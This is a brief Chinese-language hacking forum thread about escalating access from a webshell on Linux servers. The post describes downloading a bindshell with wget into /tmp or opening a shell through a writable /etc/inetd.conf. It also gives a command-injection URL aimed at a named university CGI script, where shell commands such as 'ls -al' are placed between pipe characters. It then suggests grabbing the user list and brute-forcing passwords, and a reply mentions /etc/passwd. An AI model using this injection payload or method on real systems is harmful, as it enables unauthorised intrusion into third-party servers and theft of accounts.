webshell 提升 for linux
我在zone-h得到了答案,他们是这样干的用wget把bindshell下载到/tmp/目录下
或者再/etc/inetd.conf可写的情况下直接开一个交互的shell
然后用gcc编译
[url]http://cgiserver.sogang.ac.kr/~gsviscom/cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt[/url]|ls%20-al|
ls -al显示文件
||中间的是显示的命令
很简单的办法是得到用户
最基本的办法是得到用户列表然后用流光跑密码
.... etc/passwd? 好强大 学习了 .em66. 谢谢你的帖子
页:
[1]